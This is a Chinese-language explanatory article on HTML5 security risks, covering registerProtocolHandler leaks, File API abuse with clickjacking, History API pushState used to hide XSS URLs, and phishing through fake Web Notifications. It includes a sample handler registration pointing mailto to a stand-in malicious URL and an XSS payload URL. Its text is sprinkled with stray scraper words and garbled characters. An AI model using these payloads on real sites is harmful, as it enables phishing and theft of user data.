HTML5安全风险详析之六:API攻击

HTML5里有许多协议、模式和API,可能成为攻击者的攻击途径浏览器

1、registerProtocolHandler:信息泄漏安全

HTML5容许某些协议和schema注册为新的特性。例以下面的语句能够注册一个email handler。网站

  1. 01.navigator.registerProtocolHandler(“mailto”,“http://www.f.com/?uri=%s", “Evil Mail");  

它会将一个恶意网站处理器关联到mailto这个协议上,因此它在某些状况下的滥用会致使用户信息泄漏。spa

2、文件API:窃取文件xml

HTML5另一些API从安全角度来看颇有意思,它们还能混合起来使用。ip

例如文件API容许浏览器访问本地文件,攻击者能够将它与点击劫持和其余攻击混合起来得到用户本地的文件。好比骗取你从本地拖放文件到页面里,这种方法在劫持攻击一文中有较详细的阐述。域名

3、历史API:隐藏XSS URLit

利用HTML5历史API的pushState,能够隐藏浏览器地址栏的攻击URL。例如我在浏览器地址栏输入io

  1. 01.http://test.baidu.com/?text=</div><script>history.pushState({},'',location.href.split("?").shift());document.write(1)</script>  

这个地址,用户将会仅仅只看到http://test.baidu.com/。微博

这个问题和如今流行的短网址技术结合起来,具备更大的隐蔽性。想象一下咱们在微博上看到一个短网址,不会有任何怀疑就会点击这个地址查看内容,而最后看到的地址也是至关正常的,可是在这个过程当中用户的信息和资料就不知不觉被盗取了。

短URL结合历史API的攻击

4、Web Notifications:盗取数据

Web Notifications让咱们在浏览器中可以接收推送的消息通知,可是它有可能会被攻击者利用来构造虚假信息,骗取用户数据。

例以下图里右下角的弹窗通知看起来很是正常,须要咱们输入Gmail密码来登陆查看新邮件。可是一旦输入密码,Gmail邮箱就被盗取了。咱们能够仔细看看,弹窗左上角显示的域名是gmai1.com!这正是一个钓鱼网站的欺诈手段。

桌面通知攻击

最后,随着HTML5的发展,将来还可能出现新的HTML5安全问题,还可能还会向着复杂化和智能化去发展。

相关文章
相关标签/搜索